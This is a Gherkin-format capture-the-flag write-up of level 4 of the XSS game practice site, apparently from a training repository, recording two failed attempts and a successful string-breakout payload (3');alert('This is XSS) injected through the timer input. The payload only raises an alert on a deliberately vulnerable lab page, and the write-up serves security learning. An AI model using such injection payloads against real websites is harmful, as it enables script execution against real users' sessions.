## Version 1.0
## language: en

Feature: Cross-site scripting
  Site:
    Xss-game
  Category:
    Cross-site scripting
  User:
    kzccardona
  Goal:
    Interact with the vulnerable application to execute an alert
    using the URL hhttps://xss-game.appspot.com/level4

  Background:
  Hacker's software:
    |  <Software name>  |    <version>   |
    | Microsoft Windows | 10.0.17763.437 |
    | Google Chrome     | 75.0  (64 bit) |
  Machine information:

  Scenario: Fail: Directly write "<script>" tag
    Given I wrote at the end of the URL JavaScript code as below:
    """
        https://xss-game.appspot.com/level4/
        <script>
              alert('Success')
        </script>
    """
    And I hit the enter key and the page reloads
    Then the page didn't show my alert
    And I can't get the flag

  Scenario: Fail: Use element inspector tool
    Given I try to inspect the code of the page
    When I find the variable name that sets the timer value
    """
    <input id="timer" name="timer" value="3">
    """
    Then I find the JavaScript function that starts the timer
    """
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() {
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    """
    And I try to assign a value to the var "seconds" using the console
    """
    seconds = <script>
                alert('Success')
              </script>
    """
    And I hit the enter key
    Then the console give me an error
    And I can't get the flag

  Scenario: Success: Adding a payload
    Given an input for set the timer
    Then I try to wrote in the input diferent values
    """
      1
      2
      3
      5
    """
    And I see that the URL changes every time
    """
    https://xss-game.appspot.com/level4/frame?timer=1
    https://xss-game.appspot.com/level4/frame?timer=2
    https://xss-game.appspot.com/level4/frame?timer=3
    https://xss-game.appspot.com/level4/frame?timer=5
    """
    And I try to add the payload in the input time
    """
        3');alert('This is XSS
    """
    When I click on "create timer"  and the page reloads
    Then it works and shows my alert
    Then the page gives me the flag
    """
    Congratulations, you executed an alert:

        This is XSS

    You can now advance to the next level.
    """
